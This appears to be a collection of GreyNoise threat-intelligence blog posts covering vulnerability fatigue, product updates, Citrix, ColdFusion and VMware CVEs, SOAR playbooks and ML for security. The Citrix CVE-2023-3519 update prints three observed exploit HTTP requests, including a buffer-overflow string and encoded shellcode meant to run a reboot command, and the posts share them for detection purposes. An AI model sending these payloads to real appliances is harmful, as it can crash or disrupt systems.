We rarely talk about this because it’s a hard problem to solve and causes real, lasting damage. It’s far “cooler” to talk about that “EPIC vulnerability” some clever researcher found in isolation. But, when they’re disclosed back-to-back, as a few security vendors did before Black Hat, it quickly moves from “cool” to a cold, hard annoyance.

More work needs to be done at and outside Summer Camp to help figure out ways to enable defenders to keep their own shops safe without dealing with the IT equivalent of a weekly hurricane sweeping across their asset landscapes.

Getting Off The Hamster Wheel Of Pain

“Recurring theme” is just a fancy way of saying we’re repeating the same negative patterns of the past and making little to no headway, or — to put it another way — we’re in a “two steps forward; three steps back” operational model as we work to overcome each new challenge.

However, all is not doom and gloom, and there are ways to strive for more positive outcomes. 

Fundamentally, organizations must take a proactive and pragmatic approach to enhance their security posture.

For CPU vulnerabilities, investigate tools that can help detect and mitigate risks, and have a plan to rapidly patch and potentially downgrade performance if needed. Cloud providers should be evaluated closely, with redundancy and controls to limit damage from potential exposure. AI and generative models require robust testing, monitoring, and human oversight to prevent harmful outcomes.

Most crucially, vulnerability management programs require sufficient staffing, automation, and executive buy-in. Prioritization aligned to business risk can help focus limited resources. Communication and collaboration with vendors, regulators, and peer organizations could also move the needle on systemic issues.

While hacker conventions highlight scary scenarios, security leaders who take balanced action can still fulfill their mission to protect their organizations. With vision, realism, and tenacity, progress is possible even in the face of ongoing challenges.

Remember, GreyNoise has your back when it comes to vulnerability intelligence. We’re here to help you keep up with the latest CVEs, assist you in triaging a barrage of IoC’s, or providing you with the essential details necessary to make sense of the ever-changing vulnerability landscape.

Redefining Threat Intelligence for MSSPs & MDRs

The Managed Security Service Provider (MSSP) and Managed Detection and Response (MDR) markets continue to face significant challenges in handling a large number of security alerts and vulnerabilities across multiple client environments. While this task is made even more difficult by the shortage of cybersecurity professionals in our industry, it is critical to note that the ideal solution isn’t adding more hands on deck.  It's leveraging innovation and technology that amplifies the capabilities of existing teams. 

MSSPs & MDRs require solutions that enable them to provide top-notch services to their clients while balancing already thin profit margins, all while ensuring they prevent analyst burnout. They need ways to quickly identify and respond to threats with confidence, without compromising on efficiency or service quality.

At GreyNoise, we understand the importance of every second in your margin-driven business. That's why we save you time, resources, and money – all while helping you expand your customer base. We gather, analyze, and categorize data on IPs that mass scan the internet and saturate security tools with noise. This allows analysts to spend less time on irrelevant or harmless activity and more time on targeted and emerging threats.

Here are just a few of the ways GreyNoise is helping our MSSP & MDR customers:

REDUCE COSTS

  • Trigger 25% fewer alerts across your SOC.
  • Avoid hiring additional personnel to manage alert overload.
  • Focus analyst time on triaging real threats.

IMPROVE SCALABILITY

  • Reduce customer escalations & missed threats.
  • Expand your customer base without expanding headcount.
  • Grow without compromising service, accuracy, or speed.

BEAT THE ADVERSARY

  • Empower your team with rich IP context & explainability.
  • Know about malicious IPs days ahead of other vendors.
  • Gain real-time visibility on emerging vulnerabilities.

GreyNoise scales in a way your analysts can’t. But don’t just hear it from us – see how leading MSSP Hurricane Labs is reducing costs while growing their customer base with GreyNoise.

"Any single analyst can handle, say, 20 alerts per day. But a product like GreyNoise can triage alerts for every one of our customers. So as we add more customers, GreyNoise scales in a way a person can’t.”
-Director of Managed Services, Hurricane Labs 

Want to learn more about how GreyNoise can help your MSSP & MDR?  Schedule a demo with a GreyNoise expert.

GreyNoise Round-Up: Product Updates - June And July 2023

As we roll through the summer, GreyNoise is back from its July two-week shutdown with a bunch of fresh new improvements, including 63 new tags and a bunch of exciting new data insights for our customers to explore in our Labs API.  We’ve also updated our integrations to add support for our IP Similarity and Timeline for our Palo Alto customers.

New: Explore C2 Data, HTTP activity, and more with our Labs Beta API

We’re excited to announce the availability of our Labs API. The Labs Beta API is a data source derived from the GreyNoise sensors and platform specifically designed to uncover insights our users may find intriguing and to facilitate exciting data explorations related to emerging threats.  These APIs are in beta today; however we welcome feedback that will improve the quality of our data and suggestions on how we can add them to our product.  Here are some of the datasets you can explore today:

topC2s

Access the top 10% of possible Command and Control (C2) IP addresses, ranked by their pervasiveness, observed by GreyNoise over the previous 24 hours. Use this query to identify second-stage IP addresses that might be involved in malicious activities following the reconnaissance and initial access stages. 

topHTTPRequests

Access the top 1% of HTTP requests, ranked by their pervasiveness, observed by GreyNoise over the last seven days. Gain insights into the background radiation of the internet, exploring the patterns and trends of HTTP requests.   

topPopularIPs

Access the top 1% of IPs searched in GreyNoise, ordered by the number of users observed searching over the last 7 days. Understand commonalities in how users search within GreyNoise, gaining insights into popular IPs and their associated activities. This query uses a minimum number of IP submissions and users to build consensus before an IP can be considered available in this dataset.

noiseRank

Access the top 1% of IPs by their noise score for the last 7 days. This score is determined by comparing the pervasiveness of the number of sensors and countries that observed packets from the IP, the request rate, and the diversity of payloads and ports for which the packets were observed.  This query is intended to help rank the top noise makers compared to the quiet single-hit scanners. 

Enhancement: Create an Alert for a Tag From the Tags Action Panel

We’ve added a “Create Alert” button in the Action panel on the Tag details page to make it easy to create an alert. GreyNoise users can use this to monitor scanning activity directly from the Tags page, informing them of any new IPs scanning for tags they are interested in.

Enhancement: Copy/Search Fields On IP Details

There is now a Copy/Search button in fields on the IP details page. The previous behavior did not allow users to copy the values in the fields.

You can access the Copy/Search buttons by hovering over fields such as Ports Scanned, Country, OS in the IP Details pages.

Enhancement: Analysis File Size Increased to 4MB

Previously, the Analysis Feature only accepted inputs up to 2MB.  We've increased this to 4MB, so that customers can submit larger files without getting an error. 

New and Updated Integrations

Palo Alto XSOAR (Demisto) Improvements: IP Similarity and IP Timeline Support

We updated our Palo Alto XSOAR support to include our IP Similarity and IP Timeline features, allowing users to easily find similar IP addresses, or review GreyNoise’s classification history on an IP.

To learn more about using the XSOAR Demisto enhancements for IP Similarity and Timeline, you can check out our documentation.

Tags Coverage Enhancements

In June & July, GreyNoise added 63 new tags:

56 malicious activity tags

2 benign actor tags

5 unknown tags

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert informing them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

Don't have a GreyNoise account? Sign-up for free.

Will the real Citrix CVE-2023-3519 please stand up?

(See below for the most recent update: 2023-08-03)

Citrix recently disclosed a single critical remote code execution (RCE) vulnerability, CVE-2023-3519, affecting NetScaler ADC and NetScaler Gateway (now known as Citrix ADC and Citrix Gateway. This vulnerability has a CVSS score of 9.8, making it a high-risk issue. 

GreyNoise has a tag — Citrix ADC/NetScaler CVE-2023-3519 RCE Attempt — that organizations can use to proactively defend against sources of known exploitation.

Over the past several days, numerous organizations have contributed their pieces of the puzzle, both publicly and privately. While the most recent Citrix Security Advisory identifies CVE-2023-3519 as the only vulnerability resulting in unauthenticated remote code execution, there are at least two vulnerabilities that were patched during the most recent version upgrade.

Through the analysis by Rapid 7 and AssetNote a memory corruption vulnerability was discovered in the ns_aaa_saml_parse_authn_request function that handles Security Assertion Markup Language (SAML), which can be reached through HTTP POST requests to “/saml/login”. This vulnerability has been demonstrated to corrupt memory and cause program crashes, but it is unknown whether it can be leveraged for remote code execution at this time.

Through the analysis by Bishop Fox’s Capabilities Development team together with GreyNoise a memory corruption vulnerability was identified in the ns_aaa_gwtest_get_event_and_target_names function. This function can be reached through HTTP GET requests to “/gwtest/formssso”. This vulnerability was demonstrated as capable of being leveraged for stack corruption, leading to remote code execution; and, was further corroborated by AssetNote’s Part 2 Analysis.

Through analysis from Mandiant some indications of compromise (IoCs) and post-exploitation activity are now known. As part of their provided IoCs they shared that an HTTP POST request was used in initial exploitation as well as HTTP payloads containing “pwd;pwd;pwd;pwd;pwd;” which may be useful for writing detection signatures.

2023-08-03 Update

On July 28th GreyNoise began observing activity — https://viz.greynoise.io/tag/citrix-adc-netscaler-cve-2023-3519-rce-attempt?days=30 — for CVE-2023-3519 wherein the attacker was attempting to leverage the vulnerability for memory corruption. An initial analysis of the observed payloads indicates that the attacker initially sends a payload containing 262 `A`'s which would result in a crash of the Citrix Netscaler `nsppe` program. They follow up with two variants using URL Encoded values and appear to be attempting to remotely execute the command `/bin/sh -c reboot` which would result in a full reboot in the system. However, it appears that the attacker may not be aware of the CPU endianness of vulnerable systems. The payloads they are attempting to send would result in memory corruption, but would not result in remote code execution as they expected. This would result in the `nsppe` program crashing.

The observed payloads are provided below for completeness.

GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80 HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80 HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0

Timeline

How to Leverage GreyNoise in Your SOAR Playbooks

During our latest webinar Proactive Defense Made Easy: Leveraging GreyNoise in Your SOAR Playbooks, we discussed some everyday use cases using GreyNoise with other SOAR platforms. The main goal of using GreyNoise with other SOAR platforms is to quickly identify either opportunistic attacks, get better insight into how infrastructure is being used, as well as enriching alerts using RIOT data to IP's associated with common business services.

Using GreyNoise to identify opportunistic scanning provides context to decisions in a SOAR playbook to either decide to investigate further or more quickly move to block IP's. Adding the checks into an investigation playbook provides data on scan activity and any vulnerabilities observed as being exploited.

A Tines story that uses GreyNoise as the first step to decide additional investigations needed.

RIOT data also provides quick data for an investigation. Many services integrated into an investigation playbook will provide details for when something is malicious but often don't provide details on known or known good services. Everyone wants the confidence to take action with their automation but may not have the insight needed. Additionally, no one wants to be wrong about this decision. RIOT adds this information to a playbook to assist with decision-making.

Phishing email in XSOAR identifying office 365 emails using RIOT data.

GreyNoise can be used in common SOAR use cases to provide better context to phishing playbooks and investigations and have more confidence to block IP's. The power of GreyNoise, alongside other intelligence tools like Recorded Future, VirusTotal, Tines, and Splunk, is nothing short of astonishing(see our full list of integrations). I hope the insights shared during the webinar inspired you to explore these tools further and optimize your cybersecurity investigations. Sign in/up for GreyNoise to explore our data for free.

Watch the full webinar

How to Create Actionable Intelligence with AI and Machine Learning

AI/ML and cybersecurity go together like peanut butter and bananas. You might not think it’s a fit, but it can work out great if you’re into it.

I recently did a talk with Centripetal and wanted to share some highlights as well as the entire video below. This covers a few themes, such as: “how has ML been used in cybersecurity in the past”, “what are the problems with it”, “why we need to use it”, “how to use it responsibly”, and “what to do with all these GPTs”.

If you’re interested in watching it in full, here is the talk.

ML In Security

One of the first use cases for ML in security was spam filtering in early email clients in the late 90s. This was a simple bag of words + a naive Bayes model approach, but has gotten much more complicated over time. 

More recently, ML has been used to build malware detection models. Almost all anti-malware processors in VirusTotal have some ML component.

It has also been used in outlier detection (determining spikes in logs/alerts/traffic) and in rule or workflow generation.

What’s The Problem?

However, it’s not all sunshine, roses, and solved problems. ML has some trust issues, especially when it comes to cybersecurity. Models are never perfect and can create False Negatives and False Positives. 

False Negatives are when we do not detect something as bad when it is indeed bad—it’s a miss. This has obvious problems of allowing something malicious to act on your system/network without your knowledge. 

False Positives are when we call a non-malicious thing bad. This can be just as big of a issue, as it creates unnecessary alerts, leading to alert fatigue, and ultimately leading to ignored alerts which allows actual malicious activity to slip through the cracks.

Cybersecurity has a very low tolerance for both types of errors, and therein lies the issue. ML solutions have to be very, very good at detection without creating too much noise. They also have to provide context for why the ML tool made its determination. 

Why Bother?

It might seem like a pain to use complicated tools like ML/AI, but the brutal truth is that we have to. There is too much data to work through. GreyNoise sees over 2 million unique HTTP requests a day, and that’s just one protocol.

Plus, bad actors aren’t slowing down. Verizon’s DBIR recorded 16k incidents and 5k data breaches last year, and that is merely what is reported. There are ~1,000 Known Exploited Vulnerabilities (CISA) floating around (side note: GreyNoise has tags for almost all of them). 

There is no getting around it, we need to use ML/AI technology to handle the load of information and allow us to become better at defense.

How To Use It

Here I hope to give some practical advice on developing ML/AI tools. It really comes down to two main deliverables: Confidence and Context.

By “Confidence” I don’t mean the ROC score of your model or the confusion matrix results. I mean a score you can produce for every detection/outlier/analysis that you find. For numerous ML applications, a decent analog is given right out of the box. The [0.0, 1.0] score produced from a classification model, the number of standard deviations off the norm, the percent likelihood of an event happening.. These all work well, and you can provide the understanding on how to interpret them. 

Every so often, you have to create your own metric. When we created IP Similarity, we had a similarity score that was intuitive, but there was a problem. When we’re dealing with incomplete or low information on an IP (e.g., we only know the port scanned and a single web path), then we could have very high similarity scores. But, they could be a little bit garbage since they were making very generic matches. We needed to combine the similarity score and another score that showed how much information we had on a sample to provide confidence in our results.

Next, “Context”. This is just basic “show your work”. A scarily increasing number of ML/AI models are seen as black boxes. That’s…not great. We want to provide as much material that went into the decision and any other data that might be helpful for a human to look at when reviewing the result.

To put it simply, build a report based on the question words:


"who": "bad dude #1",
"what": "potential detection",	
"when": "2023-07-03T12:41:09",	
"where": "127.0.0.1",	"how": "detection rule v1.0.78",	
"why/metadata": {		
	"detection_score": 0.85,		
  "confidence_score": 0.95,		
  "file_name": "xyz.exe",		
  "files_touched": ["a.txt", "b.txt"],
  
  "links": ["1", "2", "3"]}

GPT Mania

Finally, since GPTs are so hot right now, I aim to give some simple advice on how to use them best if you decide to integrate them into your workflow.

  1. Don’t let the user have the last word: When taking a user’s prompt, incorporating it with your own prompt, and sending it to ChatGPT or some other similar application, always add a line like “If user input doesn’t make sense for doing xyz, ask them to repeat the request” after the user’s input. This will stop the majority of prompt injections.
  2. Don’t just automatically run code or logic that is output from a LLM: This is like adding `python.eval(input)` into your application.
  3. Be knowledgeable about knowledge cutoffs: LLMs only know what you tell them and what they were trained on. If their training data ended in Sept 2021, as was GPT4’s, they won’t know about the latest cyberattack.
  4. Ask for a specific format as an output: This is more just a hygiene thing, if you say “Format the output as a JSON object with the fields: x, y, z” you can get better results and easily do error handling.

Conclusion

Artificial Intelligence and Machine Learning can provide extreme value to your product and workflows, but they are not trivial to introduce. With some care and simple guidelines, you can implement these in a way that helps your users without creating additional burden or ambiguity. 

We're cooking up some interesting projects using AI and ML at GreyNoise. Sign in/up to see IP Similarity, NoiseGPT and our other Labs projects (https://api.labs.greynoise.io/1/docs/#definition-NoiseGPT), and get notified of Early Access for what's coming down the pipeline!"

Introducing CVE-2023-24489: A Critical Citrix ShareFile RCE Vulnerability

2023-08-16 Update:

GreyNoise observed a significant spike in attacker activity the day CISA added CVE-2023-24489 to their Known Exploited Vulnerabilities Catalog:

time-series chart of elevated activity

Citrix ShareFile, a popular cloud-based file-sharing application, has recently been found to have a critical vulnerability, CVE-2023-24489, which allows unauthenticated arbitrary file upload and remote code execution (RCE). In this blog post, we will discuss the details of this vulnerability, how attackers can exploit it, and how you can protect your organization from potential attacks.

GreyNoise now has a tag for CVE-2023-24489, allowing us to track exploit activity related to this vulnerability. If you use Citrix ShareFile, make sure to apply the latest security updates as soon as possible to patch this critical RCE flaw.

What is CVE-2023-24489?

CVE-2023-24489 is a cryptographic bug in Citrix ShareFile’s Storage Zones Controller, a .NET web application running under IIS. This vulnerability allows unauthenticated attackers to upload arbitrary files, leading to remote code execution. The vulnerability has been assigned a CVSS score of 9.8, indicating its critical severity.

How are attackers exploiting CVE-2023-24489?

Attackers can exploit this vulnerability by taking advantage of errors in ShareFile’s handling of cryptographic operations. The application uses AES encryption with CBC mode and PKCS7 padding but does not correctly validate decrypted data. This oversight allows attackers to generate valid padding and execute their attack, leading to unauthenticated arbitrary file upload and remote code execution.

Researchers at Assetnote dissected the vulnerability and published the first proof-of-concept (PoC) for this CVE. Other PoCs for this have been released on GitHub, increasing the likelihood of attackers leveraging this vulnerability in their attacks and further demonstrating the severity of the issue. 

As of the publishing timestamp of this post, GreyNoise has observed IPs attempting to exploit this vulnerability. Two have never seen GreyNoise before this activity:

chart of active exploitation activity

Protecting your organization from CVE-2023-24489

Citrix has released a security update addressing the ShareFile vulnerability. Users are advised to apply the update to protect their systems from potential attacks. The fixed version of the customer-managed ShareFile storage zones controller is ShareFile storage zones controller 5.11.24 and later versions. The latest version of ShareFile storage zones controller is available from the following location: https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-511.html.

External Resources

Enhancing Security with GreyNoise

Leverage GreyNoise’s hourly updated data on scanning and exploit activities to stay ahead of opportunistic attackers. Our threat intelligence platform allows you to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems against vulnerabilities like CVE-2023-24489.

Three New Tags For ColdFusion (2 🏷️) and Citrix (1 🏷️)

GreyNoise detection engineers have released tags for 

Adobe ColdFusion Vulnerabilities

CVE-2023-29298 is an Improper Access Control vulnerability affecting Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier), and 2023.0.0.330468 (and earlier). This vulnerability could result in a security feature bypass, allowing an attacker to access the administration CFM and CFC endpoints without user interaction. The vulnerability has a CVSS 3.x base score of 7.5, indicating high severity.

CVE-2023-29300 is a Deserialization of Untrusted Data vulnerability impacting Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier), and 2023.0.0.330468 (and earlier). This vulnerability could result in arbitrary code execution without user interaction. The vulnerability has a CVSS 3.x base score of 9.8, indicating critical severity.

Citrix ADC/NetScaler Vulnerability

CVE-2023-3519 is an unauthenticated remote code execution (RCE) vulnerability impacting several versions of Citrix ADC and Citrix Gateway. This vulnerability allows a malicious actor to execute arbitrary code on affected appliances. It may also serve as an initial access vector for ransomware and other types of malicious campaigns. GreyNoise would like to thank the Capability Development team at Bishop Fox for collaborating with us to track this emerging threat. They have an excellent, detailed write-up for folks interested in more details.

CISA's Known Exploited Vulnerabilities Catalog

All three vulnerabilities are listed in CISA's Known Exploited Vulnerabilities Catalog, meaning they have been observed being exploited in the wild and pose significant risks to organizations. Organizations should prioritize remediation efforts for these vulnerabilities to reduce the likelihood of compromise by known threat actors.

External Resources

Enhance Security with GreyNoise's Threat Intelligence Data

Organizations are strongly encouraged to use GreyNoise’s hourly updated threat intelligence data to block IP addresses that are seen exploiting these vulnerabilities. By leveraging GreyNoise's tags and alerts, organizations can enhance their security posture and protect their systems from potential exploitation attempts while allowing their operations teams time to apply patches or mitigations.

Cutting Through the Noise: How GreyNoise Helps Security Analysts

In today's world, where networks generate an overwhelming amount of data, security analysts often find themselves struggling to separate the real threats from the noise. Their days are spent in a constant reactive mode, leaving little room for proactive measures due to limited time and resources. In this blog post, we'll delve into how GreyNoise empowers security analysts and transforms their daily work by cutting through the noise and providing invaluable insights.

So, what exactly is GreyNoise?

GreyNoise is a powerful threat intelligence platform designed to assist security analysts in identifying noise and minimizing false positives. By meticulously collecting and analyzing internet-wide scan and attack data, GreyNoise equips security teams with contextual information about the threats they encounter. With its ability to filter out noise and shed light on the sources of attacks, GreyNoise empowers security analysts to focus their efforts on genuine threats.

How we can help

1. Maximizing SOC Efficiency: Banishing False Positives

Security Operation Centers (SOCs) are often inundated with an overwhelming barrage of security alerts. However, it's disheartening to discover that a significant portion of these alerts, often exceeding 50%, are nothing more than false positives or irrelevant internet noise. One exasperated GreyNoise customer even lamented, "Stop chasing ghosts!" (this is why you will see our little “ghostie” icon many places on our website and in our product) GreyNoise comes to the rescue by enabling SOC teams to filter out known benign and noisy alerts originating from SIEM and SOAR systems. This empowers analysts to laser-focus on targeted and malicious activities that truly demand attention. Learn More >>

2. Enhancing Threat Intelligence: The Power of Context

GreyNoise takes threat intelligence to new heights by providing security analysts with valuable context surrounding the sources of attacks. Through thorough analysis of internet-wide scan and attack data, GreyNoise identifies patterns and offers insights into the tactics, techniques, and procedures (TTPs) employed by attackers. Armed with this knowledge, security analysts gain a deeper understanding of the threats they face, enabling them to devise more effective strategies to mitigate risks and safeguard their organizations. Learn More >>

3. Defending Against Mass exploitation Attacks: Staying One Step Ahead

GreyNoise provides an early warning system for vulnerabilities being actively exploited in the wild, plus dynamic IP blocklists that security teams can use during their window of exposure. Now you can swiftly identify trending internet attacks focused on specific vulnerabilities and CVEs, efficiently triage alerts based on malicious, benign, or targeted IP classifications, and take proactive measures to block and hunt down IP addresses opportunistically exploiting a particular vulnerability. By leveraging these comprehensive features, security teams gain an edge in staying ahead of threats and bolstering their defenses against mass exploitation attacks. Learn More >>

Conclusion

Security analysts grapple with numerous challenges in their day-to-day work, including the overwhelming volume of network data and the complexity of evolving threats. However, GreyNoise emerges as a formidable ally, providing context about attack sources, reducing false positives, and bolstering incident response capabilities. By harnessing the power of GreyNoise, security analysts can direct their attention to genuine threats and ensure their organizations remain resilient against cyber threats.

Take the first step and explore our data for free to experience the transformative power of GreyNoise firsthand. 

Text Embedding for Fun and Profit

Words != Numbers

Computers don’t understand words. They don’t understand verbs, nouns, prepositions, or even adjectives. They kinda understand conjunctions (and/or/not), but not really. Computers understand numbers.

To make computers do things with words, you have to make them numbers. Welcome to the wild world of text embedding!

In this blog I want to teach you about text embedding, why it’s useful, and a couple ways to do it yourself to make your pet project just a little bit better or get a new idea off the ground. I’ll also describe how we’re using it at GreyNoise.

Use Cases

With LLMs in the mix, modern use cases of text embedding are all over the place.

  • Can’t fit all your text into a context window? Try embedding and searching the relevant parts.
  • Working on sentiment analysis? Try to build a classifier on embedded text
  • Looking to find similar texts? Create a search index on embedded values
  • Want to build a recommendation system? Figure out how things are similar without building a classification model

In all of these, we’re encoding a piece of text into a numerical vector in order to do basic machine learning tasks against it, such as nearest neighbors or classification. If you’ve been paying attention in class, this is just feature engineering, but it’s unsupervised and on unstructured data, which has previously been a really hard problem.

How to method 1: Cheat mode

Lots of large models will offer sentence level embedding APIs. One of the most popular ones is OpenAI https://platform.openai.com/docs/guides/embeddings. It doesn’t cost a ton, probably under $100 for most data sets, but you’re dependent on the latency of external API calls and the whims of another company. Plus, since it’s a GPT model it is based on the encoding of the last word in your text (with the cumulative words before it), that doesn’t feel as cohesive as what I’m going to suggest next. (This is foreshadowing a BERT vs GPT discussion)

How to method 2: Build your own

Side quest: GPT vs BERT

GPT stands for Generative Pre-trained Transformer. It is built to predict the next word in a sequence, and then the next word, and then the next word. Alternately, BERT stands for Bidirectional Encoder Representations from Transformers. It is built to predict any word within a set piece of text. 

The little bit of difference between them, because they both use Transformers, is where they mask data while training. During the training process a piece of the text is masked, or obscured, from the model and the model is asked to predict it. When the model gets it right, hooray! When the model gets it wrong, booo! These actions either reinforce or change the weights of the neural network to hopefully better predict in the future. 

GPT models only mask the last word in a sequence. They are trying to learn and predict that word. This makes them generative. If your sequence is “The cat jumped” it might predict “over”. Then your sequence would be “The cat jumped over” and it might predict “the”, then “dog”, etc. 

BERT models mask random words in the sequence, so they are taking the entire sequence and trying to figure out the word based on what came before and after (bidirectional!!!). For this point, I believe they are better for text embedding. Note, the biggest GPT models are orders of magnitude bigger than the biggest BERT models because there is more money in generation than encoding/translation, so it is possible GPT4 does a better job at generic sentence encoding than a home grown BERT, but let's all collectively stick it to the man and build our own, it’s easy.

Figure 1: BERT based masking
Figure 2: GPT based masking

Main quest: Building a text encoder

If your data is perhaps not just basic English text data, building your own encoder and model might be the right decision. For GreyNoise, we have a ton of HTTP payloads that don’t exactly follow typical English language syntax. For this point, we decided to build our own payload model and wanted to share the knowledge.

There are two parts of a LLM. The same parts you’ll see in HuggingFace models (https://huggingface.co/models) and everywhere else. A Tokenizer and a Model. 

Tokenizer

The tokenizer takes your input text and translates it to a base numerical representation. You can train a tokenizer to learn vocabulary directly from your dataset or use the one attached to a pre-trained model. If you are training a model from scratch you might as well train a tokenizer (it takes minutes), but if you are using a pre-trained model you should stick with the one attached. 

Tokens are approximately words, but if a word is over 4-5 characters it might get broken up. “Fire” and “fly” could each be one token, but “firefly” would be broken into 2 tokens. This is why you might often hear that tokens are “about ¾ of a word”, it’s an average of word to token. Once you have a tokenizer it can translate a text into integers representing the index of the tokenizer set.

“The cat jumped over” -> 456, 234, 452, 8003

Later, supposing we have a model, if you have the output 8003, 456, 234, 452 (I reordered on purpose) you could translate that back to “over the cat jumped”

The tokenizer is the translation of a numeric representation to a word (or partial word) representation. 

Model

With a tokenizer, we can pass numerical data to a model and get numerical data out, and then re-encode that to text data.

We could discuss the models, but others have done that before (https://huggingface.co/blog/bert-101) All of these LLM models are beasts. They have basic (kinda) components, but they have a lot of them, which makes for hundreds of millions to billions of parameters. For 98% of people, you want to know what it does, the pitfalls, and how to use it without knowing the inner workings of how transformer layers are connected to embedding, softmax, and other layers. We’re going to leave that to another discussion. We’ll focus on what it takes to train and get a usable output.

The models can be initialized with basic configs and trained with easy prompts. Thanks to the folks at Huggingface (you the real MVP!). For this we are going to use a RoBERTa model (https://huggingface.co/docs/transformers/model_doc/roberta). You could use a pre-trained model and fine-tune it, however, we’re just going to use the config and build the whole model from random/scratch. A very similar workflow is usable if you want to use a pre-trained model and tokenizer though. I promise I won’t judge.

Code

Import or copy the code from model training gist

Create your own list of text you want to train the encoder and model on. It should be at least 100k samples.

If you have created your data set as `str_data` and set a model path as a folder where you want to save the model and tokenizer, you can just do:

tokenizer = create_tokenizer(model_path, str_data[0:50000]) ## you don’t really need more than 50k to train the tokenizer
model = create_model_from_scratch(model_path, tokenizer)

This will create the tokenizer and model. The tokenizer is usable at this state. The model is just random untrained garbage though.

When you’re ready for the first train, get into the habit of loading the tokenizer and model you created and training it, this is what people call “checkpoints”.

tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)
model = RobertaForMaskedLM.from_pretrained(model_path)
model = train_model(tokenizer, model, model_path, str_data[0:100000]) ## train on however much you want at a time, there is a whole other discussion about this, but give it at least 100k samples.

When you want to retrain or further train, which at this point is also called fine-tuning, just load it up and go again with new or the same data. Nobody is your boss and nobody really knows what is best right here.

Note: You’re going to want to use GPUs for training. Google Colab and Huggingface Notebooks have some free options. All in, this particular model will require 9-10GB of GPU memory, easily attainable by commodity hardware.

Evaluating

Large Language Models do not have a great list of sanity checks. Ironically most benchmarks are against other LLMs. For embeddings we can do a little better to work toward your personal model. When you take two samples that you think are similar and run them through the model to get the embeddings, you can calculate how far they are apart with either cosine or Euclidean distance. This gives you a sanity check of if your model is performing as expected or just off the rails.

For Euclidean distance use:

import numpy as np

euclidean_dist = np.linalg.norm(embedding1 - embedding2)

For cosine distance use:

from sklearn.metrics.pairwise import cosine_similarity

cos_sim = cosine_similarity(embedding1.reshape(1, -1), embedding2.reshape(1, -1))

How We’re Using it at GreyNoise

We’re early adopters of LLM tech at GreyNoise, but it is hard to put it in the hands of users responsibly. We basically don’t want to F up. We have an upcoming feature called NoiseGPT that takes natural language text and turns it into GNQL queries. Begone the days of learning a new syntax for just figuring out what the hell is going on. 

We also have an in-development feature called Sift, a way to tease out the new traffic on the internet and describe it for users. This would take the hundreds of thousands of http payloads we see every day and reduce it to the ~15 new and relevant ones and also describe what they are doing. EAP coming on that soon. 

Plus, if you think of any great ideas we should be doing, please hit us up. We have a community slack and my email is below. We want to hear from you. 

Fin

With these tips I hope you’re able to create your own LLM for your projects or at least appreciate those that do. If you have any questions please feel free to reach out to daniel@greynoise.io, give GreyNoise a try (https://viz.greynoise.io/), and look out for features using these techniques in the very near future.

Observed In The Wild: New Tag For CVE-2023-20887 — VMWare Aria Operations for Networks

On June 7, 2023 VMWare released an advisory for CVE-2023-20887, a command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Cloud Mangememt) with a critical severity score (CVSS) of 9.8. The proof of concept for this exploit was released June 13th, 2023 by SinSinology. 

Primary takeaway is:

“VMWare Aria Operations Networks is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user.” – SinSinology

This issue can be resolved by updating to the latest version. Further information can be found here: https://www.vmware.com/security/advisories/VMSA-2023-0012.html

At the time of writing we have observed attempted mass-scanning activity utilizing the Proof-Of-Concept code mentioned above in an attempt to launch a reverse shell which connects back to an attacker controlled server in order to receive further commands. Continual monitoring of activity related to this vulnerability can be tracked via the relevant GreyNoise tag below.

Example HTTP POST request containing code to exploit the described vulnerability

No blog articles found

Please update your search term or select a different category and try again.